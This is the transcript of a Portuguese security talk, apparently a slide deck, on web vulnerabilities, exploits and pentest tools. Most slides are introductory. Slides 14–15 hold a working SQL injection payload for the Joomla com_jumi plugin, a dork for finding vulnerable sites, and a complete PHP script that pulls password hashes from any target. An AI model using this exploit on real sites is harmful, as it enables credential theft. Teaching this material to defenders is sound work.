Mateus Lino - Vulnerabilidade em Sistemas, Exploits, Sistemas de Pentest

Mateus Lino - Vulnerabilidade em Sistemas, Exploits, Sistemas de Pentest

Apresentar como são exploradas falhas em vulnerabilidades em sites e como funcinam os exploits. Métodos de Criação.

184d32a034c53d328bf523c7b2ef1197?s=128

Agile Testers

April 08, 2017
Tweet

Transcript

  1. Vulnerabilidades, Exploits e Pentest • Vulnerabilidades Web • Exploits -

    Buscando falhas e automatização de exploração • Pentest - Sistemas Operacionais
  2. Quem sou? Meu nome é Mateus Lino, 19 anos, sou

    apaixonado por programação desde pequeno, aos 10 anos já escrevia meus primeiros programas em Bat. Comecei a estudar VB.NET (para aplicações Windows) e no Linux foi onde comecei a aprender sobre segurança digital. Após comecei a estudar PHP juntamente com front end. Hoje cursa Ciência da Computação e desenvolve em Ruby, Ruby on Rails, Python e JS. Atualmente trabalho na Cloud Tech Brasil, como Analista de Segurança e sou fundador da HatBashBR, grupo de pesquisa sobre segurança digital.
  3. Vulnerabilidades Web - OWASP • Injection - SQL injection •

    Broken Authentication and Session Management - Manipulação de Sessões • Cross-Site-Scripting (XSS)
  4. Injection - SQL injection SQL Injection geralmente ocorre quando você

    pede para um usuário uma entrada como seu nome de usuário / senha e, em vez de um nome / senha, o usuário te dá uma instrução SQL que você vai executar. txtUserId = getRequestString("UserId"); txtSQL = "SELECT * FROM Users WHERE UserId = " + txtUserId -> SELECT * FROM Users WHERE UserId = 105 OR 1=1
  5. SQLi - Post, Get e Formulários Formulários Vulneráveis a SQL

    injection:
  6. SQLi - Post, Get e Formulários

  7. Autenticação, GET, Brute Force Crie: • Autenticações, • Níveis de

    usuários, • Cuidado com os arquivos “confidenciais”. • Demonstração de Cookies/Sessões Burladas.
  8. Algumas coisas foram omitidas amiguinhos por segurança = ^.^ =

  9. None
  10. Exploits Exploit's são pedaços de um software ou uma sequência

    de comandos elaborados que conseguem explorar uma vulnerabilidade X. Comandos, “querys”, transferências de dados (payload) específicos que juntados com algumas linhas de programação pode fazer um grande estrago.
  11. Exploits - Payload - Apache Struts

  12. None
  13. Exploit - Apache Struts - Criação

  14. Plugin Joomla - Com_Jumi Payload: index.php?option=com_jumi&fileid=2&Itemid=4+UNION+SELECT+1,concat(us ername,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22, 23,24+from/**/jos_users+--+

  15. Plugin Joomla - Com_Jumi Dork: inurl:com_jumi index of <?php #Author:

    Mateus a.k.a Dctor - Hatbash br #fb : facebook.com/hatbashbr/ $host = "URL"; $payload = "index.php?option=com_jumi&fileid=2&Itemid=4+UNION+SELECT+1,concat(username,0x3a,password),3,4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from/**/jos_users+--+"; $u = $host.$payload; $random= array( 'http'=>array( 'method'=>"GET", 'header'=>"Accept-language: en\r\n" . "Cookie: foo=bar\r\n" . "User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8b5) Gecko/20051008 Fedora/1.5-0.5.0.beta2 Firefox/1.4.1\r\n" ));$agent= stream_context_create($random); $p = file_get_contents($u, false, $agent); if(preg_match_all('/([0-9a-fA-F]{32})/', $p, $r)){ $string = implode(", ", $r['0']); echo "[+] Target: ".$host ."\n"; echo "[+] Passwords :\n"; echo "\�33[01;31m" .$string. "\n"; }else{echo "Not Vull";} ?>
  16. None
  17. Metasploit

  18. Vulnerabilidades: como encontrá-las ? Scan: Nmap BurpSuite Nessus Zaproxy (Owasp)

    W3af Vega Nikto
  19. Nessus

  20. Nessus

  21. Vulnerabilidades: como encontrá-las ? Google Hacking Google Hacking - Pesquisa

    Avançada utilizando Google e/ou outros buscadores. Dorks. site - Faz uma busca específica no site informado allintitle - Faz uma busca específica de palavras que estão no título do site allinurl - Faz uma busca específica de arquivos e palavras na URL inurl: busca na URL filetype = Busca de Arquivos específicos link: Procura em Links
  22. Vulnerabilidades / Exploits: Como encontrar?

  23. Ruby on Rails e NodeJS - Existem falhas? Deixo essa

    perguntas pra vocês: http://www.cvedetails.com/product/22804/Nodejs-Nodejs.html?vendor_id=12 113 https://www.cvedetails.com/vulnerability-list/vendor_id-12043/product_id-225 68/Rubyonrails-Ruby-On-Rails.html
  24. Sistemas Operacionais:

  25. Kali

  26. Parrot OS

  27. None
  28. None
  29. abort (“Obrigado =] ”) puts “Telegram: @mateusbashbr github: mateeuslinno e

    hatbashbr ”